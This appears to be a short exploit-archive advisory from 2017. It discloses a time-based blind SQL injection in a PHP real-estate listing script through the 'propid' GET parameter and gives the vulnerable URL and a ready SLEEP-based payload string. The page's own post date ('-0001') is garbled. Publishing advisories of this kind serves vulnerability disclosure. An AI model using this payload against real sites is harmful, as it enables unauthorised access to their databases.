Home / os / winmobile

Property Listing Script Time-Based Blind Injection

Posted on 30 November -0001

<HTML><HEAD><TITLE>Property Listing Script – Time-Based Blind Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Exploit Title: Property Listing Script – Time-Based Blind Injection Date: 02.02.2017 Vendor Homepage: http://phprealestatescript.org/ Software Link: http://phprealestatescript.org/property-listing-script.html Exploit Author: Kaan KAMIS Contact: iletisim[at]k2an[dot]com Website: http://k2an.com Category: Web Application Exploits Overview Advanced PHP Real-Estate Script, we have almost covered the Main features required for a Property Buy and Sell Listing Script. Vulnerable Url: http://locahost/property-list/property_view.php?propid=443[payload] Parameter: propid (GET) Type: AND/OR time-based blind Simple Payload: Payload: propid=443' AND SLEEP(5) AND 'FBop'='FBop </BODY></HTML>

 

TOP